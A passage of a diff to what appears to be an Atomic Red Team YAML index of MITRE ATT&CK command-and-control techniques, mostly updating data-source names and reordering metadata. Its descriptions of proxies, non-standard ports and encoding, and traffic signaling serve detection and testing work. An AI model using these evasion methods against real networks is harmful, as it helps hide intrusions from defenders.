If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA) + x_mitre_permissions_required: + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' atomic_tests: [] T1568: technique: @@ -59661,9 +63065,9 @@ command-and-control: another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.' x_mitre_data_sources: - - SSL/TLS inspection - - Web logs - - DNS records + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Content' x_mitre_version: '1.0' x_mitre_is_subtechnique: false x_mitre_permissions_required: @@ -59675,12 +63079,6 @@ command-and-control: atomic_tests: [] T1573: technique: - created: '2020-03-16T15:33:01.739Z' - modified: '2020-03-30T00:37:16.809Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: command-and-control - type: attack-pattern external_references: - source_name: mitre-attack external_id: T1573 @@ -59707,6 +63105,12 @@ command-and-control: these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files. id: attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + modified: '2021-04-20T19:27:46.650Z' + created: '2020-03-16T15:33:01.739Z' x_mitre_version: '1.0' x_mitre_is_subtechnique: false x_mitre_detection: |- 
@@ -59714,12 +63118,7 @@ command-and-control: In general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2) x_mitre_data_sources: - - SSL/TLS inspection - - Process monitoring - - Process use of network - - Malware reverse engineering - - Netflow/Enclave netflow - - Packet capture + - 'Network Traffic: Network Traffic Content' x_mitre_platforms: - Linux - macOS @@ -59799,11 +63198,9 @@ command-and-control: - macOS - Windows x_mitre_data_sources: - - Process use of network - - Process monitoring - - Network protocol analysis - - Netflow/Enclave netflow - - Packet capture + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Content' x_mitre_detection: 'Analyze network data for uncommon data flows, such as a client sending significantly more data than it receives from an external server. Processes utilizing the network that do not normally have network communication 
@@ -59815,8 +63212,18 @@ command-and-control: atomic_tests: [] T1008: technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created: '2017-05-31T21:30:21.689Z' + modified: '2020-07-14T19:49:47.340Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + type: attack-pattern + id: attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Fallback Channels + description: Adversaries may use fallback or alternate communication channels + if the primary channel is compromised or inaccessible in order to maintain + reliable command and control and to avoid data transfer thresholds. external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1008 
@@ -59825,37 +63232,24 @@ command-and-control: description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. source_name: University of Birmingham C2 - description: Adversaries may use fallback or alternate communication channels - if the primary channel is compromised or inaccessible in order to maintain - reliable command and control and to avoid data transfer thresholds. - name: Fallback Channels - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: command-and-control - modified: '2020-07-14T19:49:47.340Z' - created: '2017-05-31T21:30:21.689Z' - x_mitre_is_subtechnique: false - x_mitre_version: '1.0' - x_mitre_data_sources: - - Malware reverse engineering - - Netflow/Enclave netflow - - Packet capture - - Process monitoring - - Process use of network + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + x_mitre_platforms: + - Linux + - Windows + - macOS + x_mitre_network_requirements: true x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)' - x_mitre_network_requirements: true - x_mitre_platforms: - - Linux - - Windows - - macOS + x_mitre_data_sources: + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Connection Creation' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false atomic_tests: [] T1568.001: technique: 
@@ -59900,7 +63294,8 @@ command-and-control: x_mitre_version: '1.0' x_mitre_is_subtechnique: true x_mitre_data_sources: - - DNS records + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Connection Creation' x_mitre_platforms: - Linux - macOS @@ -59908,18 +63303,13 @@ command-and-control: atomic_tests: [] T1071.002: technique: - external_references: - - source_name: mitre-attack - external_id: T1071.002 - url: https://attack.mitre.org/techniques/T1071/002 - - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf - description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command - & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. - source_name: University of Birmingham C2 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: File Transfer Protocols + created: '2020-03-15T16:16:25.763Z' + modified: '2020-08-21T14:41:22.911Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + type: attack-pattern + id: attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b description: "Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often 
@@ -59930,31 +63320,33 @@ command-and-control: Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. " - id: attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: command-and-control - modified: '2020-08-21T14:41:22.911Z' - created: '2020-03-15T16:16:25.763Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true + name: File Transfer Protocols + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1071.002 + url: https://attack.mitre.org/techniques/T1071/002 + - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf + description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command + & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. + source_name: University of Birmingham C2 + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_data_sources: + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. 
Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used.(Citation: University of Birmingham C2)' - x_mitre_data_sources: - - Network protocol analysis - - Process monitoring - - Process use of network - - Netflow/Enclave netflow - - Packet capture - x_mitre_platforms: - - Linux - - macOS - - Windows + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' atomic_tests: [] T1105: technique: @@ -59995,13 +63387,10 @@ command-and-control: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2) x_mitre_data_sources: - - Process command-line parameters - - File monitoring - - Packet capture - - Process use of network - - Netflow/Enclave netflow - - Network protocol analysis - - Process monitoring + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Content' + - 'File: File Creation' x_mitre_version: '2.0' identifier: T1105 atomic_tests: 
@@ -60370,21 +63759,6 @@ command-and-control: name: command_prompt T1090.001: technique: - created: '2020-03-14T23:08:20.244Z' - modified: '2020-03-15T00:46:26.598Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: command-and-control - type: attack-pattern - id: attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755 - description: |- - Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment. - - By using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems. - name: Internal Proxy - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1090.001 
@@ -60397,24 +63771,37 @@ command-and-control: description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. source_name: University of Birmingham C2 - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_data_sources: - - Process use of network - - Process monitoring - - Network protocol analysis - - Netflow/Enclave netflow - - Packet capture + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Internal Proxy + description: |- + Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment. + + By using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems. 
+ id: attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + modified: '2020-03-15T00:46:26.598Z' + created: '2020-03-14T23:08:20.244Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true x_mitre_detection: 'Analyze network data for uncommon data flows between clients that should not or often do not communicate with one another. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)' - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_data_sources: + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Content' + x_mitre_platforms: + - Linux + - macOS + - Windows identifier: T1090.001 atomic_tests: - name: Connection Proxy @@ -60541,10 +63928,7 @@ command-and-control: that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)' x_mitre_data_sources: - - Packet capture - - Process use of network - - Process monitoring - - Network protocol analysis + - 'Network Traffic: Network Traffic Content' x_mitre_platforms: - Linux - macOS @@ -60586,11 +63970,8 @@ command-and-control: - macOS - Windows x_mitre_data_sources: - - Network protocol analysis - - Process monitoring - - Process use of network - - Netflow/Enclave netflow - - Packet capture + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have 
@@ -60627,11 +64008,8 @@ command-and-control: x_mitre_is_subtechnique: false x_mitre_version: '1.0' x_mitre_data_sources: - - Netflow/Enclave netflow - - Network device logs - - Network protocol analysis - - Packet capture - - Process use of network + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Connection Creation' x_mitre_detection: Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure. @@ -60675,9 +64053,9 @@ command-and-control: In context of network devices, monitor traffic for encrypted communications from the Internet that is addressed to border routers. Compare this traffic with the configuration to determine whether it matches with any configured site-to-site Virtual Private Network (VPN) connections the device was intended to have. Monitor traffic for encrypted communications originating from potentially breached routers that is addressed to other routers within the organization. Compare the source and destination with the configuration of the device to determine if these channels are an authorized Virtual Private Network (VPN) connections or other encrypted modes of communication. Monitor ICMP traffic from the Internet that is addressed to border routers and is encrypted. Few if any legitimate use cases exist for sending encrypted data to a network device via ICMP. x_mitre_data_sources: - - Packet capture - - Network protocol analysis - - Netflow/Enclave netflow + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Content' x_mitre_platforms: - Linux - macOS 
@@ -60723,12 +64101,6 @@ command-and-control: that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) Correlating alerts between multiple communication channels can further help identify command-and-control behavior.' - x_mitre_data_sources: - - Packet capture - - Netflow/Enclave netflow - - Process use of network - - Malware reverse engineering - - Process monitoring x_mitre_version: '1.0' atomic_tests: [] T1095: @@ -60777,12 +64149,8 @@ command-and-control: x_mitre_contributors: - Ryan Becwar x_mitre_data_sources: - - Host network interface - - Netflow/Enclave netflow - - Network intrusion detection system - - Network protocol analysis - - Packet capture - - Process use of network + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' x_mitre_detection: "Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network.(Citation: Cisco Blog Legacy Device Attacks)\n\nAnalyze network data 
@@ -60887,6 +64255,25 @@ command-and-control: name: powershell T1132.002: technique: + created: '2020-03-14T23:39:50.117Z' + modified: '2020-03-14T23:39:50.117Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + type: attack-pattern + id: attack-pattern--d467bc38-284b-4a00-96ac-125f447799fc + description: 'Adversaries may encode data with a non-standard data encoding + system to make the content of command and control traffic more difficult to + detect. Command and control (C2) information can be encoded using a non-standard + data encoding system that diverges from existing protocol specifications. + Non-standard data encoding schemes may be based on or related to standard + data encoding schemes, such as a modified Base64 encoding for the message + body of an HTTP request.(Citation: Wikipedia Binary-to-text Encoding) (Citation: + Wikipedia Character Encoding) ' + name: Non-Standard Encoding + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1132.002 
@@ -60903,47 +64290,42 @@ command-and-control: description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. source_name: University of Birmingham C2 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Non-Standard Encoding - description: 'Adversaries may encode data with a non-standard data encoding - system to make the content of command and control traffic more difficult to - detect. Command and control (C2) information can be encoded using a non-standard - data encoding system that diverges from existing protocol specifications. - Non-standard data encoding schemes may be based on or related to standard - data encoding schemes, such as a modified Base64 encoding for the message - body of an HTTP request.(Citation: Wikipedia Binary-to-text Encoding) (Citation: - Wikipedia Character Encoding) ' - id: attack-pattern--d467bc38-284b-4a00-96ac-125f447799fc - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: command-and-control - modified: '2020-03-14T23:39:50.117Z' - created: '2020-03-14T23:39:50.117Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_data_sources: + - 'Network Traffic: Network Traffic Content' x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. 
Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)' - x_mitre_data_sources: - - Packet capture - - Process use of network - - Process monitoring - - Network protocol analysis - x_mitre_platforms: - - Linux - - macOS - - Windows + x_mitre_permissions_required: + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' atomic_tests: [] T1571: technique: + created: '2020-03-14T18:18:32.443Z' + modified: '2020-03-26T22:02:25.221Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + type: attack-pattern + id: attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18 + description: 'Adversaries may communicate using a protocol and port paring that + are typically not associated. For example, HTTPS over port 8088(Citation: + Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April + 2018) as opposed to the traditional port 443. Adversaries may make changes + to the standard port used by a protocol to bypass filtering or muddle analysis/parsing + of network data.' + name: Non-Standard Port + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1571 
@@ -60961,40 +64343,22 @@ command-and-control: description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. source_name: University of Birmingham C2 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Non-Standard Port - description: 'Adversaries may communicate using a protocol and port paring that - are typically not associated. For example, HTTPS over port 8088(Citation: - Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April - 2018) as opposed to the traditional port 443. Adversaries may make changes - to the standard port used by a protocol to bypass filtering or muddle analysis/parsing - of network data.' - id: attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: command-and-control - modified: '2020-03-26T22:02:25.221Z' - created: '2020-03-14T18:18:32.443Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: false + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_data_sources: + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Content' x_mitre_detection: 'Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). 
Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2)' - x_mitre_data_sources: - - Process monitoring - - Process use of network - - Netflow/Enclave netflow - - Packet capture - x_mitre_platforms: - - Linux - - macOS - - Windows + x_mitre_is_subtechnique: false + x_mitre_version: '1.0' identifier: T1571 atomic_tests: - name: Testing usage of uncommonly used port with PowerShell @@ -61077,11 +64441,9 @@ command-and-control: for uncommon data flows. User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)' x_mitre_data_sources: - - Host network interface - - Netflow/Enclave netflow - - Network protocol analysis - - Packet capture - - SSL/TLS inspection + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Connection Creation' x_mitre_platforms: - Linux - macOS @@ -61125,8 +64487,8 @@ command-and-control: x_mitre_detection: Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows. x_mitre_data_sources: - - Netflow/Enclave netflow - - Packet capture + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' x_mitre_platforms: - Linux - macOS @@ -61171,10 +64533,7 @@ command-and-control: that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)' x_mitre_data_sources: - - Packet capture - - Process use of network - - Process monitoring - - Network protocol analysis + - 'Network Traffic: Network Traffic Content' x_mitre_platforms: - Linux - Windows 
@@ -61242,11 +64601,9 @@ command-and-control: adversaries could leverage to conceal data.(Citation: University of Birmingham C2)" x_mitre_data_sources: - - Network protocol analysis - - Process monitoring - - Process use of network - - Netflow/Enclave netflow - - Packet capture + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Content' x_mitre_platforms: - Linux - macOS @@ -61254,8 +64611,19 @@ command-and-control: atomic_tests: [] T1090: technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created: '2017-05-31T21:31:08.479Z' + modified: '2020-10-21T17:54:28.531Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + type: attack-pattern + id: attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Proxy + description: |- + Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic. + + Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic. external_references: - source_name: mitre-attack external_id: T1090 
@@ -61268,40 +64636,27 @@ command-and-control: description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. source_name: University of Birmingham C2 - description: |- - Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic. - - Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic. 
- name: Proxy - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: command-and-control - modified: '2020-10-21T17:54:28.531Z' - created: '2017-05-31T21:31:08.479Z' - x_mitre_version: '3.1' - x_mitre_contributors: - - Brian Prange - - Heather Linn - - Walker Johnson - x_mitre_data_sources: - - SSL/TLS inspection - - Process use of network - - Process monitoring - - Netflow/Enclave netflow - - Packet capture - x_mitre_detection: |- - Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or between clients that should not or often do not communicate with one another). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) - - Consider monitoring for traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)). + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + x_mitre_is_subtechnique: false x_mitre_platforms: - Linux - macOS - Windows - Network - x_mitre_is_subtechnique: false + x_mitre_detection: |- + Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or between clients that should not or often do not communicate with one another). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. 
(Citation: University of Birmingham C2) + + Consider monitoring for traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)). + x_mitre_data_sources: + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Content' + x_mitre_contributors: + - Brian Prange + - Heather Linn + - Walker Johnson + x_mitre_version: '3.1' atomic_tests: [] T1219: technique: @@ -61353,10 +64708,10 @@ command-and-control: [Domain Fronting](https://attack.mitre.org/techniques/T1090/004) may be used in conjunction to avoid defenses. Adversaries will likely need to deploy and/or install these remote tools to compromised systems. It may be possible to detect or prevent the installation of these tools with host-based solutions. x_mitre_data_sources: - - Network intrusion detection system - - Network protocol analysis - - Process use of network - - Process monitoring + - 'Process: Process Creation' + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Content' x_mitre_contributors: - Matt Kelly, @breakersall x_mitre_version: '2.0' @@ -61470,10 +64825,7 @@ command-and-control: that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)' x_mitre_data_sources: - - Packet capture - - Process use of network - - Process monitoring - - Network protocol analysis + - 'Network Traffic: Network Traffic Content' x_mitre_platforms: - Linux - macOS @@ -61539,10 +64891,7 @@ command-and-control: that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)' x_mitre_data_sources: - - Packet capture - - Process use of network - - Process monitoring - - Network protocol analysis + - 'Network Traffic: Network Traffic Content' x_mitre_platforms: - Linux - macOS 
@@ -61581,12 +64930,7 @@ command-and-control: In general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2) x_mitre_data_sources: - - SSL/TLS inspection - - Process monitoring - - Process use of network - - Malware reverse engineering - - Netflow/Enclave netflow - - Packet capture + - 'Network Traffic: Network Traffic Content' x_mitre_platforms: - Linux - Windows 
@@ -61594,18 +64938,18 @@ command-and-control: atomic_tests: [] T1205: technique: - revoked: false - id: attack-pattern--451a9977-d255-43c9-b431-66de80130c8c - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Traffic Signaling - description: |- - Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software. - - Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s). - - The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. - - On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. 
Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture. + created: '2018-04-18T17:59:24.739Z' + modified: '2021-02-17T14:23:49.495Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: command-and-control + type: attack-pattern + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1205 
@@ -61626,41 +64970,75 @@ command-and-control: url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 description: Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: command-and-control - modified: '2020-10-21T15:30:44.964Z' - created: '2018-04-18T17:59:24.739Z' - x_mitre_contributors: - - Josh Day, Gigamon - x_mitre_data_sources: - - Packet capture - - Netflow/Enclave netflow - x_mitre_permissions_required: - - User + - source_name: Bleeping Computer - Ryuk WoL + url: https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/ + description: Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan + To Encrypt Offline Devices. Retrieved February 11, 2021. + - source_name: AMD Magic Packet + url: https://www.amd.com/system/files/TechDocs/20213.pdf + description: AMD. (1995, November 1). Magic Packet Technical White Paper. + Retrieved February 17, 2021. + - source_name: GitLab WakeOnLAN + url: https://gitlab.com/wireshark/wireshark/-/wikis/WakeOnLAN + description: Perry, David. (2020, August 11). WakeOnLAN (WOL). Retrieved February + 17, 2021. + description: |- + Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or 